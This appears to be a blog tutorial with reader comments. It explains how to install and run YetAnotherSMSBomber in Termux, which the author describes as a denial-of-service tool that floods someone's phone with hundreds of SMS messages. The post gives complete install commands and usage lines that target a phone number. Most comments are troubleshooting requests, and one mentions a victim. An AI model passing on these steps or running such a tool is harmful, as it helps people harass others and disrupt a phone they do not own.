On my website, I have already posted an article about SMS-Bombing using T-Bomb tool, and that tool works fine but sometimes it fails to deliver the SMS. So in this post, I am here with a new tool that is an alternative to the T-Bomb tool but works fine. If you are not satisfied with T-Bomb then you can use this tool.
What is YetAnotherSMSBomber in Termux:
If you know about hacking you know that, one of the most fatal hacker attacks is the Dos (denial of service) attack. YetAnotherSMSBomber is a Dos attack tool for SMS, it sends 100s of SMS on someone's phone. You can use this tool internationally. If you like T-Bomb then you will like this tool too.
How to install YetAnotherSMSBomber on termux?
apt update && apt upgrade -y
pkg install git python -y
The git-clone command will download the YetAnotherSMSBomber project from the GitHub repository. Just copy and paste this command in termux and the tool will be installed in 10 seconds.
git clone https://github.com/AvinashReddy3108/YetAnotherSMSBomber.git
Now we need to change the directory to the cd YetAnotherSMSBomber folder if you don't understand this command it's highly recommended to check out this blog [Basic Termux commands complete guide]
cd YetAnotherSMSBomber
Step 5:
Now we just have to use the pip command to install all the python packages that we will need to run this project.
pip3 install -r requirements.txt
How to Use YetAnotherSMSBomber on Termux?
python bomber.py -N 10 -C 91 7045xxxxxx
python bomber.py phone-number-here
10 Comments
What does this apt do to the victims phone?
ReplyDeleteBro, read the post
DeleteAnd how to protect your own number, from this
DeleteEnable DND mode on your phone
DeleteI need help
ReplyDeleteAsk bro
DeleteBro, I have a error after this like- ModuleNotFoundError: No module name 'httpx'
ReplyDeleteif you are facing this error then you can type below command:
Deletepip install httpx
or
pip3 install httpx
: bomber.py [-h] [-sms] [-call] [-mail] [-u] [-c] [-v]
ReplyDeletebomber.py: error: unrecognized arguments
good afternoon brother, when I use the last command pip3 install -r requirements.txt
ReplyDelete... is output as command not found